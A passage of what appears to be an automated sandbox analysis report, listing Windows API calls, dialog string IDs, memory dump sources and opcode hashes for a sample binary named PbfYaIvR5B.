                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000474CD
                                                                                                                      • Part of subcall function 00047A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00047AAB
                                                                                                                      • Part of subcall function 00047A9C: GetLastError.KERNEL32 ref: 00047AF1
                                                                                                                      • Part of subcall function 00047A9C: CloseHandle.KERNEL32(?), ref: 00047B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    • Opcode ID: 6f2e242dc7b419e4bf9fb67b416d055ecd5a3cfea448b546abbd230a173fb1d7
                                                                                                                    • Instruction ID: ffefc1c0592025c890f5ff0c99c1c6c4187b86cfbc846ead4f925dbd12309146
                                                                                                                    • Opcode Fuzzy Hash: 6f2e242dc7b419e4bf9fb67b416d055ecd5a3cfea448b546abbd230a173fb1d7
                                                                                                                    • Instruction Fuzzy Hash: 3731C6F1E04248AAEF51EFA4CC45FEE7BB9AF45300F044065F849AB183D7B89A44CB65
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0005ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005ADC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                    • Opcode ID: 766a9b76725cb324e92b32a79a8ae334568cbeff4966cc3eaf8cabd0d3748e24
                                                                                                                    • Instruction ID: e23a0be59b0655b6701b44305b3c9a393a58e4d5f7613566517718b98d81c2f3
                                                                                                                    • Opcode Fuzzy Hash: 766a9b76725cb324e92b32a79a8ae334568cbeff4966cc3eaf8cabd0d3748e24
                                                                                                                    • Instruction Fuzzy Hash: 4411B172344610BFE661AF68DC05FEB7BB9AB4B753F000210F642DB4A1C7659E099736
                                                                                                                    APIs
                                                                                                                    • __fprintf_l.LIBCMT ref: 0004D954
                                                                                                                    • _strncpy.LIBCMT ref: 0004D99A
                                                                                                                      • Part of subcall function 00051DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00081030,00000200,0004D928,00000000,?,00000050,00081030), ref: 00051DC4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                    • String ID: $%s$@%s
                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                    • Opcode ID: 45ef4e8b9d7be828b81722691b41c1f23471f797008e1e820846fb44fe179bcf
                                                                                                                    • Instruction ID: 3d94a372ba17050bda27ecb19e3ad131bc35dce36b26da70fbf655586533c9a2
                                                                                                                    • Opcode Fuzzy Hash: 45ef4e8b9d7be828b81722691b41c1f23471f797008e1e820846fb44fe179bcf
                                                                                                                    • Instruction Fuzzy Hash: 7D21A5B2940248AEEB21EEA4CD06FDE7BE8AF05300F044532FA14D6192E272DA49DB55
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0004AC5A,00000008,?,00000000,?,0004D22D,?,00000000), ref: 00050E85
                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0004AC5A,00000008,?,00000000,?,0004D22D,?,00000000), ref: 00050E8F
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0004AC5A,00000008,?,00000000,?,0004D22D,?,00000000), ref: 00050E9F
                                                                                                                    Strings
                                                                                                                    • Thread pool initialization failed., xrefs: 00050EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                    • Opcode ID: 6ab472236b0bdede5bcdb32147561c37fd9cfe2a4748a03514f607e65946e87f
                                                                                                                    • Instruction ID: 47c1115bc0073726428640b817cc5c7b4a238aa2d67a2871c17c3ae2dda79bbe
                                                                                                                    • Opcode Fuzzy Hash: 6ab472236b0bdede5bcdb32147561c37fd9cfe2a4748a03514f607e65946e87f
                                                                                                                    • Instruction Fuzzy Hash: C311C1B1A007089FD3305F669C859ABFBECEB65745F204C2EF5CAC2200D6B569808B64
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                    • API String ID: 0-56093855
                                                                                                                    • Opcode ID: 67b2f5a87b7c12764584b7bef0182a0f50c5c8085e3c86615139c3869720518a
                                                                                                                    • Instruction ID: f4df45d9b2bcf0b39c9c91e44f130be1cff316ec0d1d474d903c95b366896754
                                                                                                                    • Opcode Fuzzy Hash: 67b2f5a87b7c12764584b7bef0182a0f50c5c8085e3c86615139c3869720518a
                                                                                                                    • Instruction Fuzzy Hash: 27019E76A04245AFEB318F54EC089AB3BB8F709386B004427FD4582230D7798854DBB0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction ID: ed401574a86b9331b2613d73640a22bbc823a116039f0aabb8920fe38d28177f
                                                                                                                    • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                    • Instruction Fuzzy Hash: DCA15A72A047869FEB25CF68C8917FEBBEAEF55320F18416DE4859B682C3398D41C750
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00047F69,?,?,?), ref: 0004A3FA
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00047F69,?), ref: 0004A43E
                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00047F69,?,?,?,?,?,?,?), ref: 0004A4BF
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00047F69,?,?,?,?,?,?,?,?,?,?), ref: 0004A4C6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2287278272-0
                                                                                                                    • Opcode ID: a6952d08dad9bdb5daa049d824e344a7806c8a01875a7d67387de9e672c20d13
                                                                                                                    • Instruction ID: 0fd970320ddc1095ac595de7c7b8df95e8ad982b7328250206e0a1186719a31e
                                                                                                                    • Opcode Fuzzy Hash: a6952d08dad9bdb5daa049d824e344a7806c8a01875a7d67387de9e672c20d13
                                                                                                                    • Instruction Fuzzy Hash: 7341B1B1288381AAE721DF24DC55BDFBBE4ABC6300F04092DB5D593181D6A89A48DB57
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 176396367-0
                                                                                                                    • Opcode ID: c2ce1ac5a8925294a2ee6f0834468ff12b7d6a9759d60b6c4762d6d301cd3195
                                                                                                                    • Instruction ID: 27b840efef5df2a35955047180f954e13cb7e7f81b2df97800cc4c47cc0c4659
                                                                                                                    • Opcode Fuzzy Hash: c2ce1ac5a8925294a2ee6f0834468ff12b7d6a9759d60b6c4762d6d301cd3195
                                                                                                                    • Instruction Fuzzy Hash: 9641C77190066A5BDB219F688D1A9EF7BB8EF01311F000029FD45F7242DB74AE598BE4
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000691E0,?,00000000,?,00000001,?,?,00000001,000691E0,?), ref: 0006C9D5
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006CA5E
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00066CBE,?), ref: 0006CA70
                                                                                                                    • __freea.LIBCMT ref: 0006CA79
                                                                                                                      • Part of subcall function 00068E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: 7475b8e514c2b479b430e3c589e0f4ebeefecbdfe7d9c6526ddd7792bc39f1fd
                                                                                                                    • Instruction ID: 12842c30fc39ad6f9b9e87f3d6008647a9c84e55a781b3aa4726f4cb747aafe0
                                                                                                                    • Opcode Fuzzy Hash: 7475b8e514c2b479b430e3c589e0f4ebeefecbdfe7d9c6526ddd7792bc39f1fd
                                                                                                                    • Instruction Fuzzy Hash: A031A072A0020AABEB25DFA4DC45DFE7BA6EB01314B144169FC44E6251EB39CD90DBA1
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0005A666
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0005A675
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0005A683
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0005A691
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: 45c5a971e76b5da6cd09201a08de1b34001c030c7f5beda206fde9d6c0816e4c
                                                                                                                    • Instruction ID: 999d5ce80fd587aa72301c196bc1942abb76312ca347197ab43da1e63c45af75
                                                                                                                    • Opcode Fuzzy Hash: 45c5a971e76b5da6cd09201a08de1b34001c030c7f5beda206fde9d6c0816e4c
                                                                                                                    • Instruction Fuzzy Hash: 3CE0EC32942B21ABE2615B60AC1EF8B3E54AB06B52F414101FB0596290DB7C86048BA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0005A699: GetDC.USER32(00000000), ref: 0005A69D
                                                                                                                      • Part of subcall function 0005A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0005A6A8
                                                                                                                      • Part of subcall function 0005A699: ReleaseDC.USER32(00000000,00000000), ref: 0005A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0005A83C
                                                                                                                      • Part of subcall function 0005AAC9: GetDC.USER32(00000000), ref: 0005AAD2
                                                                                                                      • Part of subcall function 0005AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0005AB01
                                                                                                                      • Part of subcall function 0005AAC9: ReleaseDC.USER32(00000000,?), ref: 0005AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                    • Opcode ID: 8b7c01305b0b6614ee7f6fdcf5ec996d85fbe953e00df1ff30cda96777b600a0
                                                                                                                    • Instruction ID: 2a680c13b36c267f8beb96274b7f08a82ea77c763da1acbf3a033184302f6c13
                                                                                                                    • Opcode Fuzzy Hash: 8b7c01305b0b6614ee7f6fdcf5ec996d85fbe953e00df1ff30cda96777b600a0
                                                                                                                    • Instruction Fuzzy Hash: 5091F271608754AFE710DF25C844A2BBBE8FFC9701F00491EF99AD3221DB35A946CB62
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 000475E3
                                                                                                                      • Part of subcall function 000505DA: _wcslen.LIBCMT ref: 000505E0
                                                                                                                      • Part of subcall function 0004A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004A598
                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004777F
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A501
                                                                                                                      • Part of subcall function 0004A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004A325,?,?,?,0004A175,?,00000001,00000000,?,?), ref: 0004A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
